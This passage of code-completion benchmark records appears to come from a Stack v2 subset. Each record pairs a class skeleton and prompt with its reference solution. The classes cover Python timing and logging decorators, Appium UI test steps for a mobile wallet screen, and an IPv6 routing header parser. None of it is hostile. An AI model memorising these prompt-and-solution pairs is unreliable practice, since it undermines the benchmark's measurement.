<|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000117", "length_bytes": 3283, "license_type": "no_license", "methods": [{"docstring": "декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы", "name": "decor0", "signature": "def decor0(self, func)"}, {"docstring": "декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы", "name": "decor1", "signature": "def decor1(self, f)"}, {"docstring": "декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл", "name": "decor2", "signature": "def decor2(self, f)"}, {"docstring": "декоратор, проверяющий типы, переданных декорируемой функции, аргументов", "name": "decor3", "signature": "def decor3(self, f)"}, {"docstring": "декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции", "name": "decor4", "signature": "def decor4(self, f)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_000424", "prompt": "Implement the Python class `Decorators` described below.\n\nClass description:\nImplement the Decorators class.\n\nMethod signatures and docstrings:\n- def decor0(self, func): декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor1(self, f): декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor2(self, f): декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\n- def decor3(self, f): декоратор, проверяющий типы, переданных декорируемой функции, аргументов\n- def decor4(self, f): декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции", "prompted_full_text": "Implement the Python class `Decorators` described below.\n\nClass description:\nImplement the Decorators class.\n\nMethod signatures and docstrings:\n- def decor0(self, func): декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor1(self, f): декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\n- def decor2(self, f): декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\n- def decor3(self, f): декоратор, проверяющий типы, переданных декорируемой функции, аргументов\n- def decor4(self, f): декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\n\n<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n <|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n<|end_body_0|>\n\n<|body_start_1|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n<|end_body_1|>\n\n<|body_start_2|>\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n<|end_body_2|>\n\n<|body_start_3|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n<|end_body_3|>\n\n<|body_start_4|>\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n<|end_body_4|>\n", "revision_id": "c3225516640d872b97139a5c2919d216d5370b17", "skeleton": "<|skeleton|>\nclass Decorators:\n\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_0|>\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n <|body_1|>\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n <|body_2|>\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n <|body_3|>\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Decorators:\n def decor0(self, func):\n \"\"\"декоратор 0, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n def wrapper(*arg):\n t1 = time.clock()\n res = func(*arg)\n t2 = time.clock()\n print('%0.3fms' % ((t2 - t1) * 1000.0))\n return res\n return wrapper\n\n def decor1(self, f):\n \"\"\"декоратор 1, позволяющий вместе с результатом функции возвращать время ее работы\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n print('Time for func {} is {}'.format(f.__name__, time_end - time_start))\n print('The', f.__name__, 'result is: ', result)\n return result\n return wrapp\n\n def decor2(self, f):\n \"\"\"декоратор, позволяющий записывать время работы функции, имя функции и переданные ей параметры в текстовый файл\"\"\"\n def wrapp(*args, **kwargs):\n time_start = round(time.time(), 5)\n result = f(*args, **kwargs)\n time_end = round(time.time(), 5)\n with open('decor_data.txt', 'w') as fl:\n fl.write(' Func name is: {}\\n Work time is: {}\\n Args, kwargs are: {}\\n The result: {}'.format(f.__name__, time_end - time_start, str(*args) + ', ' + str(kwargs), result))\n return result\n return wrapp\n\n def decor3(self, f):\n \"\"\"декоратор, проверяющий типы, переданных декорируемой функции, аргументов\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n result = f(*args, **kwargs)\n print(*args)\n print('Type of args, values for func {} are args: {},\\n values:{}'.format(f.__name__, type(*args), [type(v) for v in kwargs.values()]))\n return result\n return wrapp\n\n def decor4(self, f):\n \"\"\"декоратор, который кэширует результат работы функции, тем самым обеспечивает единственный вызов функции\"\"\"\n @wraps(f)\n def wrapp(*args, **kwargs):\n if wrapp.value is False:\n print(f.__name__ + ' исполняется')\n f(*args, **kwargs)\n print(f.__name__ + ' была исполнена')\n wrapp.value = True\n return wrapp.value\n return print(\"It's already finished\")\n wrapp.value = False\n return wrapp\n", "source": "the_stack_v2_python_sparse", "source_path": "Homework11-20+22.03/Task0(decors).py", "source_repo": "Twicer/Homeworks", "split": "test", "star_events_count": 0} {"blob_id": "4b323c5f1d3b122b148d45dca3e59db54a99cb52", "bodies": ["try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\nexcept:\n unittest_TestResult = False\nfinally:\n return unittest_TestResult", "Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\nPublic_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\nPublic_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\nPublic_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\ndriver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\ntime.sleep(2)\ndriver.swipe(500, 1700, 500, 1000)\ntime.sleep(2)\ndriver.swipe(500, 1700, 500, 1000)\nPublic_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\nhuadong.shanghua(driver, 1000)\ntime.sleep(3)\ndriver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\ntime.sleep(2)\ndriver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()"], "bodies_text": "<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MyTorrent", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000118", "length_bytes": 4911, "license_type": "no_license", "methods": [{"docstring": "先决条件:进入我家页面 :return: None", "name": "MyTorrent", "signature": "def MyTorrent(driver)"}, {"docstring": "先决条件:进入我家页面 :return: None", "name": "IntoPurse", "signature": "def IntoPurse(driver)"}], "n_methods": 2, "prompt": "Implement the Python class `MyTorrent` described below.\n\nClass description:\nImplement the MyTorrent class.\n\nMethod signatures and docstrings:\n- def MyTorrent(driver): 先决条件:进入我家页面 :return: None\n- def IntoPurse(driver): 先决条件:进入我家页面 :return: None", "prompted_full_text": "Implement the Python class `MyTorrent` described below.\n\nClass description:\nImplement the MyTorrent class.\n\nMethod signatures and docstrings:\n- def MyTorrent(driver): 先决条件:进入我家页面 :return: None\n- def IntoPurse(driver): 先决条件:进入我家页面 :return: None\n\n<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n<|end_body_0|>\n\n<|body_start_1|>\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n<|end_body_1|>\n", "revision_id": "618a47ea572f8fccfbf10f5f50aff1dfffb7b0e3", "skeleton": "<|skeleton|>\nclass MyTorrent:\n\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_0|>\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MyTorrent:\n def MyTorrent(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n try:\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.debug_NomalTest(driver, title='我的种子', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/rl_user_wallet_container', Wait_Element='.modules.bounspoint.activites.BonusPointsDetailActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n unittest_TestResult = True\n except:\n unittest_TestResult = False\n finally:\n return unittest_TestResult\n\n def IntoPurse(driver):\n \"\"\"先决条件:进入我家页面 :return: None\"\"\"\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_user_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='我的钱包', MainWait_Element='.modules.main.views.activities.MainActivity', find_element_id='com.pujitech.pujiejia:id/tv_wallet', Wait_Element='.modules.wallet.views.activitys.MyWalletActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n Public_Page.NomalTest(driver, title='余额说明', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_yue_shuoming_tv', Wait_Element='.modules.help.view.activities.HelpActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n Public_Page.NomalTest(driver, title='余额充值', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_qu_chongzhi_btn', Wait_Element='.modules.wallet.views.activitys.MyWalletYuEChongzhiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title')\n driver.wait_activity('.modules.wallet.views.activitys.MyWalletActivity', 30)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n time.sleep(2)\n driver.swipe(500, 1700, 500, 1000)\n Public_Page.NomalTest(driver, title='更多明细', MainWait_Element='.modules.wallet.views.activitys.MyWalletActivity', find_element_id='com.pujitech.pujiejia:id/my_wallet_more_mingxi_tv', Wait_Element='.modules.wallet.views.activitys.MyWalletMoreMingxiActivity', check_element_id='com.pujitech.pujiejia:id/tv_title', YESBack=False)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n huadong.shanghua(driver, 1000)\n time.sleep(3)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n time.sleep(2)\n driver.find_element_by_id('com.pujitech.pujiejia:id/iv_back').click()\n", "source": "the_stack_v2_python_sparse", "source_path": "Appium/Hachi_Android/src/ReleasePage/Case04_MyTorrent.py", "source_repo": "Fengyongming0311/TANUKI", "split": "test", "star_events_count": 0} {"blob_id": "5884c9d06bb9947a11e2247472b18c5c2f5c5815", "bodies": ["next = pcs.Field('next_header', 8)\nlen = pcs.Field('length', 8)\ntype = pcs.Field('type', 8)\nsegments_left = pcs.Field('segments_left', 8)\npcs.Packet.__init__(self, [next, len, type, segments_left], bytes)", "reserved = pcs.Field('reserved', 32, default=0)\nheader = [reserved]\nfor i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\npcs.Packet.__add__(self, header)"], "bodies_text": "<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "class_docstring": "A class that contains the IPv6 routing extension-headers.", "class_name": "rthdr", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000119", "length_bytes": 7919, "license_type": "no_license", "methods": [{"docstring": "IPv6 routing extension header from RFC 2460", "name": "__init__", "signature": "def __init__(self, bytes=None)"}, {"docstring": "IPv6 routing extension header type 0", "name": "rthdr0", "signature": "def rthdr0(self, seg=1, bytes=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004089", "prompt": "Implement the Python class `rthdr` described below.\n\nClass description:\nA class that contains the IPv6 routing extension-headers.\n\nMethod signatures and docstrings:\n- def __init__(self, bytes=None): IPv6 routing extension header from RFC 2460\n- def rthdr0(self, seg=1, bytes=None): IPv6 routing extension header type 0", "prompted_full_text": "Implement the Python class `rthdr` described below.\n\nClass description:\nA class that contains the IPv6 routing extension-headers.\n\nMethod signatures and docstrings:\n- def __init__(self, bytes=None): IPv6 routing extension header from RFC 2460\n- def rthdr0(self, seg=1, bytes=None): IPv6 routing extension header type 0\n\n<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n<|end_body_0|>\n\n<|body_start_1|>\n reserved = pcs.Field('reserved', 32, default=0)\n header = [reserved]\n for i in range(seg):\n header.append(pcs.StringField('address' + str(i), 128))\n pcs.Packet.__add__(self, header)\n<|end_body_1|>\n", "revision_id": "a070a39586b582fbeea72abf12bbfd812955ad81", "skeleton": "<|skeleton|>\nclass rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n <|body_0|>\n\n def rthdr0(self, seg=1, bytes=None):\n \"\"\"IPv6 routing extension header type 0\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class rthdr:\n \"\"\"A class that contains the IPv6 routing extension-headers.\"\"\"\n\n def __init__(self, bytes=None):\n \"\"\"IPv6 routing extension header from RFC 2460\"\"\"\n next = pcs.Field('next_header', 8)\n len = pcs.Field('length', 8)\n type = pcs.Field('type', 8)\n segments_left = pcs.Field('segments_left', 8)\n pcs.Packet.__init__(self, [next, len, type, segments_left], bytes)\n\n def 